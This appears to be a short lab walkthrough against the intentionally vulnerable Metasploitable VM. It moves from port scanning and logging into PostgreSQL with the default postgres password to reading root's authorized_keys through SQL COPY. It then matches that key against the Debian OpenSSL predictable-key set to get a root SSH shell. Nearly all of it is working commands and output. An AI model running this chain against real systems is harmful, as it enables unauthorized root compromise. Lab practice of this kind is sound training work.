# Metasploitable (postgres + openssl)

Introducción

Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit (Python)

Ejecución
# msfconsole
msf > nmap -sV -O -p 22,5432 192.168.1.50
[*] exec: nmap -sV -O -p 22,5432 192.168.1.50

PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
5432/tcp open  postgresql PostgreSQL DB
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: OS: Linux

msf > search postgres
msf > use scanner/postgres/postgres_login
msf auxiliary(postgres_login) > set rhosts 192.168.1.50
msf auxiliary(postgres_login) > exploit
[+] 192.168.1.50:5432 Postgres - Logged in to 'template1' with 'postgres':'postgres'
[+] 192.168.1.50:5432 Postgres - Success: postgres:postgres (Database 'template1' succeeded.)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(postgres_login) > psql -h 192.168.1.50 -U postgres -W
[*] exec: psql -h 192.168.1.50 -U postgres -W

Password for user postgres:
create table sshkey (input text);
copy sshkey from '/root/.ssh/authorized_keys';
select * from sshkey;
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
(1 fila)
# wget http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2
# tar xvjf debian_ssh_rsa_2048_x86.tar.bz2
# cd rsa/2048
# grep -l AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
57c3115d77c56390332dc5c49978627a-5429.pub
# ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.50
root@metasploitable:~# uname -a
Linux metasploitable 2.6.24-16-server
root@metasploitable:~# whoami
root

No comments: